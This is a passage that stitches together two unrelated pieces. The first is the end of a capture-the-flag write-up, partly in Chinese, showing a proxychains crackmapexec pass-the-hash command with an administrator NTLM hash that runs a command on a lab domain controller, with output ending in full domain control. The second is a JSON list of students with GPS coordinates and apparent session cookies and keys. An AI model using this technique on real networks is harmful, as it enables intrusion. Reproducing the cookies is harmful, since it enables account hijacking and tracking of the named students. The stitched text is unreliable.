[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
meterpreter > proxychains crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[-] Unknown command: proxychains. Run the help command for more details.
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17

最后一连,执行命令,type出flag
得到flag3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[/home/kali]
└─# proxychains crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.2:445 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.2:135 ... OK
SMB 172.22.1.2 445 DC01 [*] Windows Server 2016 Datacenter 14393 x64 (name:DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:True)
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.2:445 ... OK
SMB 172.22.1.2 445 DC01 [+] xiaorang.lab\administrator:10cf89a850fb1cdbe6bb432b859164c8 (Pwn3d!)
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.2:135 ... OK
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.1.2:49666 ... OK
SMB 172.22.1.2 445 DC01 [+] Executed command
SMB 172.22.1.2 445 DC01 ___ ___
SMB 172.22.1.2 445 DC01 \\ / / / / // | | // ) ) // ) ) // | | /| / / // ) )
SMB 172.22.1.2 445 DC01 \ / / / //__| | // / / //___/ / //__| | //| / / //
SMB 172.22.1.2 445 DC01 / / / / / ___ | // / / / ___ ( / ___ | // | / / // ____
SMB 172.22.1.2 445 DC01 / /\\ / / // | | // / / // | | // | | // | / / // / /
SMB 172.22.1.2 445 DC01 / / \\ __/ /___ // | | ((___/ / // | | // | | // |/ / ((____/ /
SMB 172.22.1.2 445 DC01
SMB 172.22.1.2 445 DC01
SMB 172.22.1.2 445 DC01 flag03: e8f88d0d43d6}
SMB 172.22.1.2 445 DC01
SMB 172.22.1.2 445 DC01 Unbelievable! ! You found the last flag, which means you have full control over the entire domain network.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
{
"students": [
{
"name": "yst",
"class": "107492",
"lat": "26.03816",
"lng": "119.18831",
"acc": "30",
"cookie": "s=70R7MBhip4eBuykjpHt3eRjkgElSu9NJqIhmRleW; remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=4301236%7CUXztbF4hKjWgVEANujINP0TkvgTu1ubqBL6XAlfYMGTPCP2kp2ihQU1l2xE4%7C%242y%2410%24SlXd98MiAClJUxPQHkp3q.rxEdHM5YfcwYCtqm3dN2U2k4L0b4PUi; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJwYWdlQ291bnRlciUyMiUzQTAlN0Q=",
"QmsgKEY": "16ab07db12df7ec4aa914a64745f82f8",
"WXKey": ""
},
{
"name": "cyh",
"class": "107492",
"lat": "26.03816",
"lng": "119.18831",
"acc": "30",
"cookie": "s=X2ut5ymXP1kLj7OzuP2HU1kpO27z1sJPSY4pEwAs; remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3260040%7CRVrV5jpg3jIEsPN8ZDHZTB4qAiChL97ilmh7gMQKKgPr9qmIEkJ1PhNSKHZE%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJwYWdlQ291bnRlciUyMiUzQTAlN0Q=",
"QmsgKEY": "0194daf908324b0469be9eb80a9871d9",
"WXKey": ""
},
{
"name": "cch",
"class": "107492",
"lat": "26.03816",
"lng": "119.18831",
"acc": "30",
"cookie": "s=8MSfaGU0woulOFthiwagpfEdbcgxIpqeaLKfa6Zr; remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3259549%7ChNsRpn2y2w8ERdJCqB160OvpOrOrecXVD6ZiyzdpUXIG2sKo5CTz2Rbgujy7%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJwYWdlQ291bnRlciUyMiUzQTAlN0Q=",
"QmsgKEY": "66a0b7f55705d79d2b8ed6be3c0a07ea",
"WXKey": ""
},
{
"name": "wsy",
"class": "107492",
"lat": "26.03816",
"lng": "119.18831",
"acc": "30",
"cookie": "s=xlI8xVOw6soDDxQVHO9jurg4hB8ByVmKCAfvEvKp; remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3259554%7Comq3L2Wj0jlFGwQlMEtoZcr5zSPXz6BW6Qos2WssfiSJeFSQLPHm1H7N6POc%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJwYWdlQ291bnRlciUyMiUzQTAlN0Q=",
"QmsgKEY": "0194daf908324b0469be9eb80a9871d9",
"WXKey": ""
},
{
"name": "zgh",
"class": "107492",
"lat": "26.03816",
"lng": "119.18831",
"acc": "30",
"cookie": "s=nTYlnQFzdrSoMCbk7A9Dg7zP39wOwpPRWSPasGx0; remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3260011%7C8MrFXxGtp5EjAriYsMxOH0mkwohEO8Nq4At7VbDyow2ioNYA0INIbKpZEmWP%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJiYjAzNDRhNy04ZTE4LTQ4OTItYWQ0Yi04YmJiYTA0Y2ViNjMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY4MDIyOTAxJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJwYWdlQ291bnRlciUyMiUzQTAlN0Q=",
"QmsgKEY": "7ebaeefd84eba46a2ee77c3c071bd632",
"WXKey": ""
},
{
"name": "gh",
"class": "107492",
"lat": "26.03816",
"lng": "119.18831",
"acc": "30",
"cookie": "s=CS9gbWuDjyLOMrLHavakKGMEAWdil2e3tDjyZ18t; remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3260416%7CuGoNBnjIyuXZXznQ9bOHKcjpiCzYQ8Vm2samlAu6tsPCqzKJntQutfv9CvkT%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJwYWdlQ291bnRlciUyMiUzQTAlN0",
"QmsgKEY": "16ab07db12df7ec4aa914a64745f82f8",
"WXKey": ""
},
{
"name": "chn",
"class": "107492",
"lat": "26.03816",
"lng": "119.18831",
"acc": "30",
"cookie": "remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3259920%7CxA4a5zZ20jERuvtzaboJL6nwsJBrNOj3d7gQxz4frMg8fjO3W7z3gtldMfKT%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJwYWdlQ291bnRlciUyMiUzQTAlN0Q=",
"QmsgKEY": "7ebaeefd84eba46a2ee77c3c071bd632",
"WXKey": ""
},
{
"name": "wyj",
"class": "107492",
"lat": "26.03816",
"lng": "119.18831",
"acc": "30",
"cookie": "s=g282mBFaqwTmHitHGoalnZv5k7PP0Y899PNTrAAP; remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3260000%7CtQZ8ff3DsGUhi2ofY8b7HYlPMb9WOSMAnUXn4yKMD92DE8ytAs2JhK5vVYsm%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJwYWdlQ291bnRlciUyMiUzQTAlN0Q=",
"QmsgKEY": "b120fbca2afad07be0644e03bc1a7438",
"WXKey": ""
},
{
"name": "zzt",
"class": "107492",
"lat": "26.03816",
"lng": "119.18831",
"acc": "30",
"cookie": "remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3281025%7CrHbOJqwz5JPWqWHyhfxSLAecyCVIgBRpE4W5uCZgHzLnc7ZCPf3ElwDewFuM%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJ",
"QmsgKEY": "66a0b7f55705d79d2b8ed6be3c0a07ea",
"WXKey": ""
},
{
"name": "zjy",
"class": "107492",
"lat": "26.03816",
"lng": "119.18831",
"acc": "30",
"cookie": "remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3259693%7Cg4ELjVgSBIL6wzm6S67Asv1uRKYODcj5Rt6sMQ6x6X75uAqawk3p20lQgho5%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJ",
"QmsgKEY": "66a0b7f55705d79d2b8ed6be3c0a07ea",
"WXKey": ""
},
{
"name": "cyz",
"class": "107492",
"lat": "26.03816",
"lng": "119.18831",
"acc": "30",
"cookie": "remember_student_59ba36addc2b2f9401580f014c7f58ea4e30989d=3259485%7CfugAy5xoW77rV4YeKL3Wtepb231wWfMGMUm5Gg5YOeovMvO4kEPBuxzw8XvF%7C; AMP_16e8798ff2=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJmODZhOWFlYi04ZDdkLTQwOTQtOTFhNS1mYzMwM2FmMGZmMGMlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzY0MTY3NjA3MzUwJ",
"QmsgKEY": "66a0b7f55705d79d2b8ed6be3c0a07ea",
"WXKey": ""
}


]
}